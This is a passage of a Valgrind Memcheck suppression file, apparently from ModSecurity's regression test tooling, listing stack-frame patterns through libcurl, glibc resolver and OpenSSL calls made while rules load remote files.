fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__GI_strchr obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__GI_strchr obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:memmove obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:assign fun:_M_set_length fun:_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_appendEPKcm fun:append fun:_ZN11modsecurity5Utils11HttpsClient11handle_implEPcmm obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_IO_vfscanf fun:__isoc99_vsscanf fun:__isoc99_sscanf obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:inet_pton obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:inet_pton obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:inet_pton fun:gaih_inet.constprop.5 fun:getaddrinfo obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:start_thread fun:clone } { Memcheck:Value8 fun:tolower fun:strcasecmp fun:_nss_files_gethostbyname4_r fun:gaih_inet.constprop.5 fun:getaddrinfo obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:start_thread fun:clone } { Memcheck:Value8 fun:tolower fun:strcasecmp fun:_nss_files_gethostbyname4_r fun:gaih_inet.constprop.5 fun:getaddrinfo obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:start_thread fun:clone } { Memcheck:Param open(filename) obj:/usr/lib/libc-2.24.so fun:_IO_file_open fun:_IO_file_fopen@@GLIBC_2.2.5 fun:__fopen_internal obj:/usr/lib/libnss_mymachines.so.2 obj:/usr/lib/libnss_mymachines.so.2 obj:/usr/lib/libnss_mymachines.so.2 fun:_nss_mymachines_gethostbyname4_r fun:gaih_inet.constprop.5 fun:getaddrinfo obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:start_thread fun:clone } { Memcheck:Param sendmsg(msg.msg_iov[1]) fun:sendmsg obj:/usr/lib/libnss_resolve.so.2 obj:/usr/lib/libnss_resolve.so.2 obj:/usr/lib/libnss_resolve.so.2 obj:/usr/lib/libnss_resolve.so.2 fun:_nss_resolve_gethostbyname4_r fun:gaih_inet.constprop.5 fun:getaddrinfo obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:start_thread fun:clone } { Memcheck:Param sendmsg(mmsg[0].msg_hdr.msg_iov[0]) fun:sendmmsg obj:/usr/lib/libresolv-2.24.so fun:__libc_res_nquery obj:/usr/lib/libresolv-2.24.so fun:__libc_res_nsearch fun:_nss_dns_gethostbyname4_r fun:_nss_resolve_gethostbyname4_r fun:gaih_inet.constprop.5 fun:getaddrinfo obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:start_thread fun:clone } { Memcheck:Param sendmsg(mmsg[1].msg_hdr.msg_iov[0]) fun:sendmmsg obj:/usr/lib/libresolv-2.24.so fun:__libc_res_nquery obj:/usr/lib/libresolv-2.24.so fun:__libc_res_nsearch fun:_nss_dns_gethostbyname4_r fun:_nss_resolve_gethostbyname4_r fun:gaih_inet.constprop.5 fun:getaddrinfo obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:start_thread fun:clone } { Memcheck:Value8 fun:tolower fun:strcasecmp fun:ns_samename fun:__res_nameinquery fun:__res_queriesmatch obj:/usr/lib/libresolv-2.24.so fun:__libc_res_nquery obj:/usr/lib/libresolv-2.24.so fun:__libc_res_nsearch fun:_nss_dns_gethostbyname4_r fun:_nss_resolve_gethostbyname4_r fun:gaih_inet.constprop.5 fun:getaddrinfo obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:start_thread fun:clone } { Memcheck:Value8 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:inet_pton obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Param write(buf) obj:/usr/lib/libc-2.24.so fun:sock_write fun:BIO_write fun:ssl23_write_bytes fun:ssl23_connect obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 obj:/usr/lib/libcurl.so.4.4.0 fun:curl_multi_perform fun:curl_easy_perform fun:_ZN11modsecurity5Utils11HttpsClient8downloadERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity9operators10PmFromFile4initERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEPS7_ fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ 